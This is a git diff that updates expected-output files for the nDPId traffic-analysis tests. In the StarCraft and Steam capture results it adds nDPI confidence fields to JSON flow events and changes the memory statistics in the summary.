+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389963466,"flow_last_seen":1437389963469,"flow_idle_time":180000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":4522,"flow_avg_l4_payload_len":411,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00822{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1437389964790,"flow_last_seen":1437389968014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":124502,"flow_avg_l4_payload_len":695,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00600{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389953741,"flow_last_seen":1437389953805,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389956550,"flow_last_seen":1437389956605,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":71,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00661{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389967432,"flow_last_seen":1437389968027,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389953741,"flow_last_seen":1437389953805,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389956550,"flow_last_seen":1437389956605,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":71,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389967432,"flow_last_seen":1437389968027,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}}
 00167{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","total-events-serialized":314}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 800/797
@@ -320,10 +320,10 @@
 ~~ total active/idle flows...: 52/52
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4705682 bytes
-~~ total memory freed........: 4705682 bytes
-~~ total allocations/frees...: 100573/100573
+~~ total memory allocated....: 4773907 bytes
+~~ total memory freed........: 4773907 bytes
+~~ total allocations/frees...: 102163/102163
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 172 chars
-~~ json string max len.......: 956 chars
-~~ json string avg len.......: 566 chars
+~~ json string max len.......: 1040 chars
+~~ json string avg len.......: 608 chars
diff --git a/test/results/steam.pcap.out b/test/results/steam.pcap.out
index 6434017a8..d3c77485e 100644
--- a/test/results/steam.pcap.out
+++ b/test/results/steam.pcap.out
@@ -1,173 +1,173 @@
 00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"steam.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1357332164693,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164693,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx\/AqLyVkkKYDbJhaYoALLORVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1357332164693,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164693,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkyDAqLyVkkKYDLJhaYsALLORVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1357332164694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164694,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LvAqLyVUatzCLJhaYoALBkuVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1357332164694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164694,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L3AqLyVUatzBrJhaYkALBkxVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164736,"flow_last_seen":1357332164736,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164736,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1357332164736,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164736,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qbAqLyVRRyRrLJhaYoALAcZVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164736,"flow_last_seen":1357332164736,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164736,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164736,"flow_last_seen":1357332164736,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164736,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1357332164737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164737,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LvAqLyVUatzCLJhaYkALBkvVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
